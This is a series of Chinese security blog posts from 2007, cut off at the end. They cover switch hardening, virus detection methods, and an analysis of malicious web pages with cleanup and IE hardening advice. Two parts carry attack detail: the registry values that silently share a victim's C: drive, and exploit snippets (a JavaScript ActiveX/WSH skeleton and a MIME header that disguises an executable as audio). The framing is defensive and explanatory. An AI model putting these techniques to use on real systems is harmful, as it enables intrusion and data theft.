的虛拟機技術,也不過是個雛形,有很多的功能并不能完全虛拟化,同時若加殼代碼本身可變形,同時有多種加殼算法可供随機選擇,那麽就很難找出其中的規律以 及關系。總之,好的殺毒軟件至少應該具有的技術功能之一就是要具備壓縮還原技術:對Pklite、Diet、Exepack、Com2exe、 Lzexe、Cpav等幾百種壓縮加殼軟件自動還原,徹底解除隐藏較深的病毒,避免病毒死灰複燃。</span></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-2272805511084795573?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-73502023135451906192007-08-22T01:46:00.003-07:002007-08-22T01:46:41.547-07:00如何讓網路堅不可摧 交換機安全六則<div style="font-size: 12px;"><span style="color:black;">如何過濾用戶通訊,保障安全有效的數據轉發?如何阻擋非法用戶,保障網絡安全應用?如何進行安全網管,及時發現網絡非法用戶、非法行爲及遠程網管信息的安全性呢?這裏我們總結了6 條近期交換機市場上一些流行的安全設置功能,希望對大家有所幫助。<br /><br /><b>L2-L4 層過濾</b><br /><br /> 現在的新型交換機大都可以通過建立規則的方式來實現各種過濾需求。規則設置有兩種模式,一種是MAC模式,可根據用戶需要依據源MAC或目的MAC有效 實現數據的隔離,另一種是IP模式,可以通過源IP、目的IP、協議、源應用端口及目的應用端口過濾數據封包;建立好的規則必須附加到相應的接收或傳送端 口上,則當交換機此端口接收或轉發數據時,根據過濾規則來過濾封包,決定是轉發還是丢棄。另外,交換機通過硬件“邏輯與非門”對過濾規則進行邏輯運算,實 現過濾規則确定,完全不影響數據轉發速率。<br /><br /><b>802.1X 基于端口的訪問控制</b><br /><br /> 爲了阻止非法用戶對局域網的接入,保障網絡的安全性,基于端口的訪問控制協議802.1X無論在有線LAN或WLAN中都得到了廣泛應用。例如華碩最新 的GigaX2024/2048等新一代交換機産品不僅僅支持802.1X 的Local、RADIUS 驗證方式,而且支持802.1X 的Dynamic VLAN 的接入,即在VLAN和802.1X 的基礎上,持有某用戶賬号的用戶無論在網絡内的何處接入,都會超越原有802.1Q 下基于端口VLAN 的限制,始終接入與此賬号指定的VLAN組内,這一功能不僅爲網絡内的移動用戶對資源的應用提供了靈活便利,同時又保障了網絡資源應用的安全性;另外, GigaX2024/2048 交換機還支持802.1X的Guest VLAN功能,即在802.1X的應用中,如果端口指定了Guest VLAN項,此端口下的接入用戶如果認證失敗或根本無用戶賬号的話,會成爲Guest VLAN 組的成員,可以享用此組内的相應網絡資源,這一種功能同樣可爲網絡應用的某一些群體開放最低限度的資源,并爲整個網絡提供了一個最外圍的接入安全。<br /><br /><b>流量控制(traffic control)</b><br /><br /> 交換機的流量控制可以預防因爲廣播數據包、組播數據包及因目的地址錯誤的單播數據包數據流量過大造成交換機帶寬的異常負荷,并可提高系統的整體效能,保持網絡安全穩定的運行。<br /><br /></span><span style="color:black;"><b>SNMP v3 及SSH<br /><br /></b> 安全網管SNMP v3 提出全新的體系結構,将各版本的SNMP 标準集中到一起,進而加強網管安全性。SNMP v3建議的安全模型是基于用戶的安全模型,即USM。USM對網管消息進行加密和認證是基于用戶進行的,具體地說就是用什麽協議和密鑰進行加密和認證均由 用戶名稱(userNmae)權威引擎标識符(EngineID)來決定(推薦加密協議CBCDES,認證協議HMAC-MD5-96 和HMAC-SHA-96),通過認證、加密和時限提供數據完整性、數據源認證、數據保密和消息時限服務,從而有效防止非授權用戶對管理信息的修改、僞裝 和竊聽。<br /><br /> 至于通過Telnet 的遠程網絡管理,由于Telnet 服務有一個緻命的弱點——它以明文的方式傳輸用戶名及口令,所以,很容易被别有用心的人竊取口令,受到攻擊,但采用SSH進行通訊時,用戶名及口令均進行 了加密,有效防止了對口令的竊聽,便于網管人員進行遠程的安全網絡管理。<br /><br /><b>Syslog和Watchdog</b><br /><br /> 交換機的Syslog 日志功能可以将系統錯誤、系統配置、狀态變化、狀态定期報告、系統退出等用戶設定的期望信息傳送給日志服務器,網管人員依據這些信息掌握設備的運行狀況,及早發現問題,及時進行配置設定和排障,保障網絡安全穩定地運行。<br /><br /> Watchdog 通過設定一個計時器,如果設定的時間間隔内計時器沒有重啓,則生成一個内在CPU重啓指令,使設備重新啓動,這一功能可使交換機在緊急故障或意外情況下時可智能自動重啓,保障網絡的運行。<br /><br /><b>雙映像文件</b><br /><br /> 一些最新的交換機, 像A S U SGigaX2024/2048還具備雙映像文件。這一功能保護設備在異常情況下(固件升級失敗等)仍然可正常啓動運行。文件系統分majoy和 mirror兩部分進行保存,如果一個文件系統損害或中斷,另外一個文件系統會将其重寫,如果兩個文件系統都損害,則設備會清除兩個文件系統并重寫爲出廠 時默認設置,确保系統安全啓動運行。<br /><br /> 其實,近期出現的一些交換機産品在安全設計上大都下足了功夫——層層設防、節節過濾,想盡一切辦法将可能存在的不安全因素最大程度地排除在外。廣大企業 用戶如果能夠充分利用這些網絡安全設置功能,進行合理的組合搭配,則可以最大限度地防範網絡上日益泛濫的各種攻擊和侵害,願您的企業網絡自此也能更加穩固 安全。</span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-7350202313545190619?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-90248289352929654032007-08-22T01:46:00.001-07:002007-08-22T01:46:28.288-07:00流覽惡意網頁硬碟被非法共用<span style="font-size: 12px;"><span style="color:black;">所謂的浏覽網頁硬盤被共享,是受害者在浏覽了 含有有害代碼的ActiveX網頁文件後中招的。以下是該網頁源代碼中的關鍵部分:在HKEY_LOCAL_MACHINE\Software\ Microsoft\Windows\CurrentVersion\Network\LanMan下面添加鍵值“RWC$”,在RWC$“下又分别建立 鍵值”Flags“、”Type“”Path“,這樣就把c盤設爲共享</span><span style="color:black;">,共享名爲RWC$.而 且,你在網絡屬性中還看不到硬盤被共享了!如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可 看到硬盤被共享。隻要浏覽這類網頁硬盤被共享,其危害較之木馬要更大。如果不小心中招,那麽完全可以把你的硬盤當做他的一個邏輯硬盤,他可以在你電腦中随 意拷貝文件,删除文件,給文件改名……什麽秘密都沒有了,甚至可以格式化你的硬盤,總之,你的一切都在他的掌握之下了,想想夠可怕了吧?! </span><br /><br /><span style="color:black;">應該如何解決呢?</span><br /><span style="color:black;">把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Network\LanMan下面的“RWC$”删掉。也可以把windows\system\下面的Vserver.vxd(Microsoft 網絡上的文件與打印機共享,虛拟設備驅動程序)删掉,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\VxD\下的Vserver鍵值删掉,永絕這類“木馬”的後路吧!</span><br /><br /><span style="color:black;">防禦防範:</span><br /><span style="color:black;">1、要避免中招,關鍵是不要輕易去一些自己并不了解的站點,特别是那些看上去美麗誘人的網址,更不要貿然前往,否則吃虧的往往是你。</span><br /><br /><span style="color:black;">2、運行IE,點擊“工具→Internet選項→安全→Internet區域的安全級别,把安全級别由”中“改爲”高“。</span><br /><br /><span style="color:black;">3、由于該類網頁是含有有害代碼的ActiveX網頁文件,因此在IE設置中将ActiveX插件和控件、 Java腳本等全部禁止,就可以避免中招。具體方法是:在IE窗口中點擊“工具→Internet選項,在彈出的對話框中選擇”安全“标簽,再點擊”自定 義級别“按鈕,就會彈出”安全設置“對話框,把其中所有ActiveX插件和控件以及Java相關全部選擇”禁用“即可。不過,這樣做在以後的網頁浏覽過 程中可能會造成一些正常使用ActiveX的網站無法浏覽。唉,有利就有弊,您還是自己看着辦吧。</span><br /><br /><span style="color:black;">4、對于Windows98用戶,請打開C:\WINDOWS\JAVA\Packages\ CVLV1NBB.ZIP,把其中的“ActiveXComponent.class”删掉;對于WindowsMe用戶,請打開C:\WINDOWS\ JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。請放心,删除這個組件不會影響 到你正常浏覽網頁的。 </span><br /><br /><span style="color:black;">5、既然這類網頁是通過修改注冊表來破壞我們的系統,那麽我們可以事先把注冊表加鎖:禁止修改注冊表,這樣就可以達到預防的目的。不過,如果自己要使用注冊表編輯器regedit.exe時,該怎麽辦呢?因此我們還要在此前事先準備一把“鑰匙”,以便打開這把“鎖”!</span><br /><br /><span style="color:black;">加鎖方法如下:</span><br /><span style="color:black;">(1)運行注冊表編輯器regedit.exe;</span><br /><span style="color:black;">(2)展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System下,新建一個名爲DisableRegistryTools的DWORD 值,并将其值改爲“1”,即可禁止使用注冊表編輯器regedit.exe.</span><br /><br /><span style="color:black;">解鎖方法如下:</span><br /><span style="color:black;">用記事本編輯一個任意名字的。reg文件,比如unlock.reg,内容如下:</span><br /><br /><span style="color:black;">REGEDIT4</span><br /><span style="color:black;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000</span><br /><span style="color:black;">存盤。你就有了一把解鎖的鑰匙了!如果要使用注冊表編輯器,則雙擊unlock.reg即可。要注意的是,在“REGEDIT4”後面一定要空一行,并且“REGEDIT4”中的“4”和“T”之間一定不能有空格,否則将前功盡棄!</span><br /><br /><span style="color:black;">6、安裝網絡防火牆,特别是安裝了Norton2001後,進入該類網頁就會報警提示有腳本寫注冊表,國産反病毒軟件KVW3000也有此類功能,建議您也安裝一個這樣的軟件。</span><br /><br /><span style="color:black;">7、雖然經過一番辛苦的勞動修改回了标題和默認連接首頁,但如果以後又不小心進入該站,就又得麻煩一次。其實,你可以在IE中做一些設置,以便永遠不進該站點:</span><br /><span style="color:black;">打開IE,點擊“工具”→“Internet選項”→“内容”→“分級審查”,點“啓用”按鈕,會調出“分級審查”對話框,然後點擊“許可站點”标簽,輸入不想去的網站網址,如輸入:<a href="http://www.sohu8.com/" target="_blank">http://www.sohu8.com</a>,按“從不”按鈕,再點擊“确定”,即大功告成!</span></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-9024828935292965403?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-65398836346595418012007-08-22T01:45:00.004-07:002007-08-22T01:46:10.664-07:00硬盤及内存檢測病毒 - 四種查病毒的絕招<div style="font-size: 12px;"><span style="color:black;">病毒要進行傳染,必然會留下痕迹。生物醫學病毒 如此,電腦病毒也是一樣。檢測電腦病毒,就要到病毒寄生場所去檢查,發現異常情況,并進而驗明“正身”,确認電腦病毒的存在。電腦病毒靜态時存儲于硬盤 中,被激活時駐留在内存中,因此對電腦病毒的檢測可以分爲對硬盤的檢測和對内存的檢測。 </span><br /><br /><span style="color:black;">一般對硬盤進行病毒檢測時,要求内存中不帶病毒,因爲某些電腦病毒會向檢測者報告假情況。例如“4096”病毒 在内存中時,查看被它感染的文件,不會發現該文件的長度已發生變化,而當在内存中沒有病毒時,才會發現文件長度已經增長了4096字節;又例如, “DIR2”病毒在内存中,用Debug程序查看被感染文件時,根本看不到“DIR2”病毒的代碼,很多檢測程序因此而漏過了被感染的文件;還有引導區型 的“巴基斯坦智囊”病毒,當它活躍在内存中時,檢查引導區就看不到病毒程序而隻看到正常的引導扇區。因此,隻有在要求确認某種病毒的類型和對其進行分析、 研究時,才能在内存中帶毒的情況下作檢測工作。從原始的、未受病毒感染的DOS系統軟盤啓動,可以保證内存中不帶病毒。啓動必須是上電啓動而不是按鍵盤上 的“Alt+Ctrl+Del”三鍵的那種熱啓動,因爲某些病毒可以通過截取鍵盤中斷,将自己駐留在内存中。檢測硬盤中的病毒,啓動系統軟盤的DOS版本 号應該等于或高于硬盤内DOS系統的版本号。如果硬盤上使用了硬盤管理軟件DM、ADM,硬盤壓縮存儲管理軟件Stacker、DoubleSpace 等,啓動系統軟盤時應把這些軟件的驅動程序包括在軟盤上,并把它們寫入config.sys文件中,否則用系統軟盤引導啓動後,将不能訪問硬盤上的所有分 區,使躲藏在其中的病毒逃過檢查。 </span><br /><span style="color:black;"> </span><br /><span style="color:black;">檢測硬盤中的病毒可分成檢測引導區型病毒和檢測文件型病毒。這兩種檢測的原理上相同,但由于病毒的存儲方式不 同,檢測方法還是有差别的。主要是基于下列四種方法:比較被檢測對象與原始備份的比較法;利用病毒特征代碼串進行查找的搜索法;搜索病毒體内特定位置的特 征字識别法;運用反彙編技術分析被檢測對象,确證是否爲病毒的分析法。</span><br /><span style="color:black;"> </span><br /><span style="color:black;"><b>比較法</b> </span><br /><span style="color:black;">這是用原始備份與被檢測的引導扇區或被檢測的文件進行比較的方法,可以用打印的代碼清單(比如Debug的D命 令輸出格式)進行比較,也可用程序來進行比較(如DOS的DISKCOMP、COMP或PCTOOLS等其它軟件)。比較法不需要專用的查病毒程序,隻要 用常規DOS軟件和PCTOOLS等工具軟件就可以進行,而且還可以發現那些尚不能被現有的殺毒軟件發現的計算機病毒。因爲病毒傳播得很快,新病毒層出不 窮,而目前還沒有能查出一切病毒的通用程序,或通過代碼分析,可以判定某個程序中是否含有病毒的查毒程序,所以隻有靠比較法和分析法,或這兩種方法相結合 來發現新病毒。 對硬盤的主引導區或對DOS的引導扇區作檢查,用比較法能發現其中的程序源代碼是否發生了變化。由于要進行比較,因此保留好原始備份是非 常重要的。制作備份時必須在無電腦病毒的環境裏進行,制作好的備份必須妥善保管,寫好标簽,貼好寫保護。比較法的好處是簡單、方便,不用專用軟件;缺點是 無法确認病毒的種類名稱。另外,造成被檢測程序與原始備份之間差别的原因尚需進一步驗證,以查明是電腦病毒造成的,還是DOS數據被偶然原因,如突然停 電、程序失控、惡意程序等破壞的。這些要用到以後講的分析法,查看變化部分代碼的性質,以此來确認是否存在病毒。</span><br /><br /><span style="color:black;"><b>搜索法</b> </span><br /><span style="color:black;">這種方法主要是對每一種病毒含有的特定字符串進行掃描,如果在被檢測對象内部發現了某一種特定字節串,就表明發 現了該字節串所代表的病毒。國外稱這種按搜索法工作的病毒掃描軟件爲“Scanner”。這種病毒掃描軟件由兩部分組成:一部分是病毒代碼庫,含有經過特 别選定的各種電腦病毒的代碼串;另一部分是利用該代碼庫進行掃描的掃描程序,病毒掃描程序能識别的電腦病毒的數目完全取決于病毒代碼庫内所含病毒種類的多 少。病毒代碼串的選擇是非常重要的,短小的病毒代碼隻有一百多個字節,長的也隻有10KB字節。一定要在仔細分析程序之後選出最具代表特性的,足以将該病 毒區别于其它病毒和該病毒的其它變種的代碼串。一般情況下,代碼串是由連續若幹個字節組成的,但是有些掃描軟件采用的是可變長串,即在串中包含有一個到幾 個“模糊”字節。掃描軟件遇到這種串時,隻要除“模糊”字節之外的字串都能完好匹配,就也能夠判别出病毒。另外,特征串還必須能将病毒與正常的非病毒程序 區,不然就會出現“假報、誤報”。</span><br /><span style="color:black;"> </span><br /><span style="color:black;"><b>特征字識别法</b> </span><br /><span style="color:black;">這是基于特征串掃描法發展起來的一種方式,運行速度較快、誤報頻率較低。特征字識别法隻須從病毒體内抽取很少的 幾個關鍵特征字,組成特征字庫。由于需要處理的字節很少,又不必進行串匹配,因此大大加快了識别速度,當被處理的程序很大時,用這種辦法比較合适。由于特 征字識别法更注意電腦病毒的“程序活性”,因此減少了錯報的可能性。使用基于特征串掃描法的查病毒軟件方法與使用基于特征字識别法的查病毒軟件方法是一樣 的,隻要運行查毒程序,就能将已知的病毒檢查出來。這兩種方法的使用,都須要不斷地對病毒庫進行擴充,一旦捕捉到病毒,經過提取特征并加入到病毒庫,就能 使查病毒程序多檢查出一種新病毒來。</span><br /><br /><span style="color:black;"><b>分析法</b> </span><br /><span style="color:black;">這種方法一方面可以确認被觀察的磁盤引導區和程序中是否含有病毒,另一方面可以辨認病毒的類型和種類,判定是否 爲一種新病毒,另外還可以搞清楚病毒體的大緻結構,提取用于特征識别的字節串或特征字,增添到病毒代碼庫中供病毒掃描和識别程序使用。同時,詳細地分析病 毒代碼,還有助于制定相應的反病毒方案。與前三種檢測病毒的方法不同,使用分析法檢測病毒,除了要具有相關的知識外,還需要使用Debug、 Proview等分析工具程序和專用的試驗用計算機。因爲即使是很精通病毒的技術人員,使用性能完善的分析軟件,也不能完全保證在短時間内将病毒代碼分析 清楚;而病毒則有可能在被分析階段繼續傳染甚至發作,把軟盤、硬盤内的數據完全毀壞掉,所以分析工作必須在專門的試驗用PC機上進行,不怕其中的數據被破 壞。不具備必要的條件,不要輕易開始分析工作。很多電腦病毒采用了自加密、抗跟蹤等技術,使得分析病毒的工作經常是冗長枯燥的。特别是某些文件型病毒的源 代碼可達10KB以上,與系統的牽扯層次很深,使詳細的剖析工作十分複雜。病毒檢測的分析法是反病毒工作中不可或缺的重要技術,任何一個性能優良的反病毒 系統的研制和開發都離不開專門人員對各種病毒詳盡、認真的分析。 </span><br /><br /><span style="color:black;">分析法分爲靜态和動态兩種。靜态分析是指利用Debug等反彙編程序将病毒代碼打印成反彙編後的程序清單進行分 析,看病毒分成哪些模塊,使用了哪些系統調用,采用了哪些技巧,如何将病毒感染文件的過程翻轉爲清除病毒、修複文件的過程,哪些代碼可被用做特征碼以及如 何防禦這種病毒等等。分析人員的素質越高,分析過程就越快,理解也就越深;動态分析則是指利用Debug等程序調試工具在内存帶毒的情況下,對病毒作動态 跟蹤,觀察病毒的具體工作過程,以進一步在靜态分析的基礎上理解病毒工作的原理。在病毒編碼比較簡單的情況下,動态分析不是必須的。但是,當病毒采用了較 多的技術手段時,就必須使用動、靜相結合的分析方法才能完成整個分析過程。 </span><br /><br /><span style="color:black;">綜上所述,利用原始備份和被檢測程序相比較的方法适合于不用專用軟件,可以發現異常情況的場合,是一種簡單、基本的病毒檢測方法;掃描特征串和識别特性字的方法更适用于廣大PC機用戶使用,方便而又迅速;但對新出現的病毒會出現漏檢的情況,須要與分析和比較法結合使用。</span><br /><br /><span style="color:black;">通過采取技術上和管理上的措施,電腦病毒是完全可以防範的</span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-6539883634659541801?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-91793639219721489642007-08-22T01:45:00.003-07:002007-08-22T01:45:53.733-07:00網頁病毒深度剖析以及手工清除的方法前 言<br /><br /> 殺毒軟件風靡全球的今天,各式各樣的病毒仍然在網絡上橫行,其形式的多樣化,自身之?蔽性都大大的提高。其中,網頁病毒、網頁木馬就是這個新型病毒大軍中危害面最廣泛,傳播效果最佳的。之所以會出此篇,也是在考慮到太多的人都在網頁病毒中“應聲倒下”,卻不知自己是如何中毒,以及中毒後如何去處理。就此問題,我們開始以下,對網頁病毒、網頁木馬這一“新概念”做個詳細的剖析。<br />注:?什?會用這?大的篇幅去介紹網頁病毒、網頁木馬的常識和運行機理,而非機械地去介紹如何如何做,大家在通讀全文後便有個新的了解。<br /><br /><br />第一章 惡意網頁的基本常識<br /><br /><br />第一節 什?是網頁病毒<br /><br />網頁病毒是利用網頁來進行破壞的病毒,它存在于網頁之中,其實是使用一些SCRIPT語言編寫的一些惡意代碼利用IE的漏洞來實現病毒植入。當用戶登錄某些含有網頁病毒的網站時,網頁病毒便被悄悄激活,這些病毒一旦激活,可以利用系統的一些資源進行破壞。輕則修改用戶的注冊表,使用戶的首頁、?覽器?題改變,重則可以關閉系統的很多功能,裝上木馬,染上病毒,使用戶無法正常使用計算機系統,嚴重者則可以?用戶的系統進行格式化。而這種網頁病毒容易編寫和修改,使用戶防不勝防。<br />目前的網頁病毒都是利用JS.ActiveX、WSH共同合作來實現對客戶端計算機,進行本地的寫操作,如改寫你的注冊表,在你的本地計算機硬盤上添加、?除、更改文件夾或文件等操作。而這一功能卻恰恰使網頁病毒、網頁木馬有了可乘之機。<br />而在我們分析網頁病毒前,先叫我們知道促使病毒形成的罪魁禍首:Windows 腳本宿主 和Microsoft Internet Explorer漏洞利用<br />第二節 Windows 腳本宿主,Internet Explorer漏洞以及相關<br /><br />WSH,是“Windows Scripting Host”的縮略形式,其通用的中文譯名?“Windows 腳本宿主”。對于這個較?抽象的名詞,我們可以先作這樣一個籠統的理解:它是?嵌于 Windows 操作系統中的腳本語言工作環境。<br /> Windows Scripting Host 這個概念最早出現于 Windows 98 操作系統。大家一定還記得 MS-Dos 下的批處理命令,它曾有效地簡化了我們的工作、帶給我們方便,這一點就有點類似于如今大行其道的腳本語言。但就算我們把批處理命令看成是一種腳本語言,那它也是 98 版之前的 Windows 操作系統所唯一支持的“腳本語言”。而此後??各種真正的腳本語言不斷出現,批處理命令顯然就很是力不從心了。面臨這一危機,微軟在研發 Windows 98 時,?了實現多類腳本文件在 Windows 界面或 Dos 命令提示符下的直接運行,就在系統?植入了一個基于 32 位 Windows 平台、并獨立于語言的腳本運行環境,并?其命名?“Windows Scripting Host”。WSH 架構于 ActiveX 之上,通過充當 ActiveX 的腳本引擎控制器,WSH ? Windows 用戶充分利用威力強大的腳本指令語言掃清了障礙。<br /> WSH也有它的不足之處,任何事物都有兩面性,WSH 也不例外。應該說,WSH 的優點在于它使我們可以充分利用腳本來實現計算機工作的自動化;但不可否認,也正是它的這一特點,使我們的系統又有了新的安全?患。許多計算機病毒制造者正在熱衷于用腳本語言來編制病毒,并利用 WSH 的支持功能,讓這些?藏?病毒的腳本在網絡中廣?傳播。借助WSH的這一缺陷,通過JAVASCRIPT,VBSCRIPT,ACTIVEX等網頁腳本語言,就形成了現在的“網頁危機”。<br />促使這一問題發生的還有問題多多Internet Explorer 的自身漏洞。比如:“錯誤的MIMEMultipurpose Internet Mail Extentions,多用途的網際郵件擴充協議頭”,“Microsoft Internet Explorer?覽器彈出窗口Object類型驗證漏洞”。而以下介紹的幾個組件存在的問題或漏洞或是在安全問題上的過濾不嚴密問題,卻又造成了“網頁危機”的另外一個重要因素。<br />l Java語言可以編寫兩種類型的程序:應用程序(Application)和小應用程序(Applet)。應用程序是可以獨立運行的程序,而Applet不能獨立運行,需要嵌入HTML文件,遵循一套約定,在支持Java的?覽器(如:Netscape Navigator 2.02版本以上,HotJava,Microsoft Internet Explorer 3.0版本以上)運行,是Java一個重要的應用分支,也是當時Java最令人感興趣的地方(它一改網頁呆闆的界面),就是在WWW網頁(Home Page / Pages)設計中加入動畫、影像、音樂等,而要達到這些效果使用最多的是Java Applet和Java Script (這是一種Java的命令語言)。<br />l JavaScript是一種基于對象(Object)和事件驅動(Event Driven)并具有安全性能的腳本語言。使用它的目的是與HTML超文本?記語言、與Web客戶交互作用。從而可以開發客戶端的應用程序等。它是通過嵌入或文件引用在?準的HTML語言中實現的。它的出現彌補了HTML語言的缺陷,它是Java與HTML折衷的選擇,具有基于對象、簡單、安全、動?、跨平台性等特性。<br />l ActiveX是Microsoft提出的一組使用COM(Component Object Model,部件對象模型)使得軟件部件在網絡環境中進行交互的技術。它與具體的編程語言無關。作?針對Internet應用開發的技術,ActiveX被廣泛應用于WEB服務器以及客戶端的各個方面。同時,ActiveX技術也被用于方便地創建普通的桌面應用程序。在Applet中可以使用ActiveX技術,如直接嵌入ActiveX控制,或者以ActiveX技術?橋梁,?其它開發商提供的多種語言的程序對象集成到Java中。與Java的字節碼技術相比,ActiveX提供了“代碼簽名”(Code Signing)技術保證其安全性。<br /><br />第三節 網頁病毒的攻擊方式<br /><br />既然是網頁病毒,那?很簡單的說,它就是一個網頁,甚至于制作者會使這個特殊網頁與其他一般的網頁?無他樣,但在這個網頁運行與本地時,它所執行的操作就不僅僅是下載後再讀出,伴??前者的操作背後,還有這病毒原體軟件的下載,或是木馬的下載,然後執行,悄悄地修改你的注冊表,等等…那?,這類網頁都有什?特征呢?<br />§ 1.美麗的網頁名稱,以及利用?覽者的無知.<br />不得不承認,很多惡意網頁或是站點的制作者,他們對?覽者的心理分析是下功夫的,對域名的選擇和利用絕對是很到位的。很多上網的男性網民大都對MM照片感興趣,這就是他們利用的一個渠道。如你看到了一個域名:www.lovemm.com,或是http://plmm.yeah.net等等. 你會動心去看?。如果不會,再看這個域名:/Article/UploadFiles/200603/20060301160330179.gif 這個地址你會去看??很顯然,咋一看,圖片!一張可能是MM的圖片,又有懂點安全知識的人說了,放心它不可能是BMP圖片木馬,你用這個地址打開一定是張.GIF格式的圖片。好,你可以去嘗試一下。再看另外一個域名,很顯然是經過構造的。/Article/UploadFiles/200603/20060301160331961.gif 你還能“火眼金睛”嗎?不知道結果是什?,那你就放心的去點擊它看看。<br /><br />§ 2.利用?覽者的好奇心<br />在這裏我要說一句,這樣的人中毒也是自找。對什?都要好奇這可不是個好習慣。有些東西不是你想看就可以去看的。[作者注]有這個習慣的都改改.^_^!<br /><br />§ 3.無意識的?覽者<br />這類人,對他們的同情,我們表示遭遇。^_^!<br /><br />在我們基本了解了網頁病毒、網頁木馬的運行機體環境後,讓我們開始重點分析一下網頁病毒是如何對我們的計算機進行攻擊,并染毒,并自我保護的。<br /><br /><br /><br /><br />第二章 網頁病毒、網頁木馬機理深度剖析<br /><br /><br />第一節 網頁病毒、網頁木馬的制作方式<br /><br />Ⅰ.Javascript.Exception.Exploit<br />利用JS+WSH的完美結合,來制作惡意網頁的方法幾乎是所有惡意站點必有的“功能”。<br /><br />Ⅱ. 錯誤的MIME Multipurpose Internet Mail Extentions,多用途的網際郵件擴充協議頭.<br />幾乎是現在網頁木馬流行利用的基本趨勢,這個漏洞在IE5.0到IE6.0版本中都有,對這?一個全能的漏洞,大家怎能不重視?<br /><br />Ⅲ..EXE to .BMP + Javascritp.Exception.Exploit<br />具體的.EXE轉化到.BMP的文章我想大家都見到過,而且不隻一次。應用方法很簡單:誘騙?覽者上當。<br /><br />Ⅳ. iframe 漏洞的利用<br />當微軟的IE窗口打開另一個窗口時,如果子窗口是另一個域或安全區的話,安全檢查應當阻止父窗口訪問子窗口。但事實并非如此,父窗口可以訪問子窗口文檔的frame,這可能導緻父窗口無論是域或安全區都能在子窗口中設置Frame或IFrame的URL。這會帶來嚴重的安全問題,通過設置URL指向javascript協議,父窗口能在子域環境下運行腳本代碼,包括任意的惡意代碼。攻擊者也能在“我的電腦”區域中運行腳本代碼。這更會造成嚴重的後果。<br /><br />Ⅴ.通過安全認證的CAB,COX<br />此類方法就是在.CAB文件上做手腳,使證書.SPC和密鑰.PVK合法<br />原理:IE讀文件時會有文件讀不出,就會去“升級”這樣它會在網頁中指定的位置找 .cab 并在系統裏寫入個CID讀入.cab裏的文件。<br />方法:.cab是WINDOWS裏的壓縮文件,我們知道IE裏所用的安全文件是用簽名的CAB也不例外,所做的CAB是經過安全使用證書引入的。也就是說IE認證攻擊,隻所以每次都能入侵我的腦,是因?它通過的是IE認證下的安全攻擊,這樣不管我怎?做都沒辦法。<br /><br />Ⅵ.EXE文件的捆綁<br />現在的網頁木馬捆綁機幾乎是開始泛濫了,多的數不勝數。再?生成的MHT文件進行加密,好,這樣一來,連我們最信任的殺毒軟件也無效了。<br /><br />第二節 網頁病毒、網頁木馬的運行機理分析<br /><br />Ⅰ.Javascript.Exception.Exploit<br />精華語句:<br />Function destroy(){<br />try<br />{<br />//ActiveX initialization 初始化ActiveX,?修改注冊表做準備<br />a1=document.applets[0];<br />//獲取applet運行對象,以下語句指向注冊表中有關IE的表項<br />a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";<br />a1.createInstance();<br />Shl = a1.GetObject();<br />a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}";<br />a1.createInstance();<br />FSO = a1.GetObject();<br />a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}";<br />a1.createInstance();<br />Net = a1.GetObject();<br />try<br />{<br />開始做壞事<br />}<br />}<br />catch(e)<br />{}<br />}<br />catch(e)<br />{}<br />}<br />function do()<br />{<br />//初始化函數,并每隔一秒執行修改程序<br />setTimeout("destroy()", 1000); //設定運行時間1秒<br />}<br />Do() //壞事執行函數指令<br /><br />全部是JS編寫,沒有什?高深的技術,但它卻可以把你的計算機注冊表改的是亂78糟,在你的計算機裏留下各式各樣的垃圾,甚至于連聲招呼都不打就G了你的硬盤。所列出的整段函數看起來簡單明了,聲明函數,初始化環境,取得注冊對象,執行讀,寫,?權限,定義操作時間(快得叫你連反映都沒有)。<br /><br />Ⅱ. 錯誤的MIME Multipurpose Internet Mail Extentions,多用途的網際郵件擴充協議頭.<br />精華語句:<br />Content-Type: multipart/related;<br />type="multipart/alternative";<br />boundary="====B===="<br />--====B====<br />Content-Type: multipart/alternative;<br />boundary="====A===="<br />--====A====<br />Content-Type: text/html;<br />Content-Transfer-Encoding: quoted-printable<br /><br />--====A====--<br />--====B====<br />Content-Type: audio/x-wav;<br />name="run.exe"<br />Content-Transfer-Encoding: base64<br />Content-ID: ---以下省略AAAAA N+1個---<br /><br />把run.exe的類型定義?audio/x-wav,這下清楚了,這是利用客戶端支持的 MIME(多部<br />分網際郵件擴展,Multipart Internet Mail Extension) 類型的漏洞來完成的。當申明郵件<br />的類型?audio/x-wav時,IE存在的一個漏洞會?附件認?是音頻文件自動嘗試打開,,結果導緻郵件文件x.eml中的附件run.exe被執行。在win2000上,即使是用鼠?點擊下載下來的 x.eml,或是拷貝粘貼,都會導緻x.eml中的附件被運行。整個程序的運行還是依靠x.eml這個文件來支持。Content-Transfer-Encoding: base64 Content-ID: 從這我們可以看出,由于定義後字符格式?base64,那?一下的代碼全部?加密過的代碼,裏面可以是任何執行的命令:<br />〈script language=vbs〉<br />On Error Resume Next· 